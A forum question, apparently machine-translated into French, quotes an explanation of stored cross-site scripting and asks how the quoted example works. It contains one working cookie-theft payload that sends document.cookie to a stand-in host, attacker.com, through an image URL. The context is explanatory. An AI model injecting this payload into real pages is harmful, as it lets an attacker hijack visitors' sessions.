Citée de http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt:Question sur un type d'attaque XSS
Comme beaucoup ici savent probablement, les attaques actuelles XSS viennent typiquement en deux saveurs: 1 - ajouts Attacker balises à une carte de bulliten publique, blog, ou un autre site qui a a une vulnérabilité XSS et que beaucoup d'autres utilisateurs visiteront. L'attaquant normalement récolte des cookies de site pour usurper l'identité de l'utilisateur, mais des soumissions de formulaire et d'autres attaques sont parfois utilisées. C'est ce que beaucoup de gens à qui je parle pensent que XSS est. Voici un exemple:
Quelqu'un posterais ce qui suit sur evilblog.com que d'autres utilisateurs traiteraient
<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>
Cela essaierait de tirer une image avec evilblog de l'utilisateur hors du serveur de l'attaquant cookies dans l'URL .
Ma question:
Je ne comprends pas le but/résultat de chemin d'URL de l'image ci-dessus en cours d'écriture. Quelqu'un peut-il en dire plus à ce sujet?
PS: Qu'est-ce que cela signifie pour « Cela essaierait de tirer une image hors serveur de l'attaquant avec les cookies evilblog de l'utilisateur dans l'URL »
Une explication claire sur l'utilisation des images. Merci. – Ricky